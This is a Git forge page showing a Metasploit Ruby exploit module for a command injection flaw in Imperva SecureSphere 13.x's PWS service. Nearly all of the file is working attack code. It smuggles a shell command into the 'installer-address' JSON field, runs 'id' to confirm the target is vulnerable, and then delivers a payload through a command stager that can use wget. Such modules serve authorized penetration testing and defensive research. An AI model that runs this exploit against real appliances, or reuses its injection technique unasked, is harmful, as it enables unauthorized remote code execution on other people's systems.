adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
71aa4c8d9e742c6aaf319cffe4cf72dffe5a4b3e
metasploit-gs/modules/exploits/linux/http/imperva_securesphere_exec.rb
T

140 lines
4.1 KiB
Ruby
Raw Blame History

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Imperva SecureSphere PWS Command Injection',
'Description' => %q(
This module exploits a command injection vulnerability in Imperva
SecureSphere 13.x. The vulnerability exists in the PWS service,
where Python CGIs didn't properly sanitize user supplied command
parameters and directly passes them to corresponding CLI utility,
leading to command injection. Agent registration credential is
required to exploit SecureSphere in gateway mode.
This module was successfully tested on Imperva SecureSphere 13.0/13.1/
13.2 in pre-ftl mode and unsealed gateway mode.
),
'License' => MSF_LICENSE,
'Author' =>
[
'rsp3ar <lukunming<at>gmail.com>' # Discovery/Metasploit Module
],
'References' =>
[
[ 'EDB', '45542' ]
],
'DisclosureDate' => "Oct 8 2018",
'DefaultOptions' => { 'SSL' => true },
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'CmdStagerFlavor' => %w{ echo printf wget },
'Targets' =>
[
['Imperva SecureSphere 13.0/13.1/13.2', {}]
],
'DefaultTarget' => 0))
register_options(
[
OptPort.new('RPORT', [true, 'The target port', 443]),
OptString.new('USER', [false, 'Agent registration username', 'imperva']),
OptString.new('PASS', [false, 'Agent registration password', '']),
OptString.new('TARGETURI', [false, 'The URI path to impcli', '/pws/impcli']),
OptInt.new('TIMEOUT', [false, 'HTTP connection timeout', 25])
])
end
def send_request(data)
req_params = {
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'data' => data.to_json
}
unless datastore['USER'].to_s.empty? or datastore['PASS'].to_s.empty?
unless defined? @cookie
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri('/')
})
unless res
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end
@cookie = res.get_cookies
end
req_params['cookie'] = @cookie
req_params['headers'] = {
'Authorization' => basic_auth(datastore['USER'], datastore['PASS'])
}
end
send_request_cgi(req_params, datastore['TIMEOUT'])
end
def execute_command(cmd, opts = {})
data = {
'command' => 'impctl server status',
'parameters' => {
'broadcast' => true,
'installer-address' => "127.0.0.1 $(#{cmd})"
}
}
begin
res = send_request data
rescue Rex::ConnectionError, Errno::ENOTCONN => e
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
if res
if res.code == 401
fail_with(Failure::NoAccess, 'Authorization Failure, valid agent registration credential is required')
end
unless res.code == 406 and res.body.include?("impctl")
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end
end
res
end
def check
begin
res = execute_command('id')
rescue => e
print_error("#{e}")
return CheckCode::Unknown
end
if res.body =~ /uid=\d+/
return CheckCode::Vulnerable
end
CheckCode::Safe
end
def exploit
unless CheckCode::Vulnerable == check
unless datastore['ForceExploit']
fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
end
print_warning 'Target does not appear to be vulnerable'
end
print_status("Sending payload #{datastore['PAYLOAD']}")
execute_cmdstager
end
end
Reference in New Issue View Git Blame Copy Permalink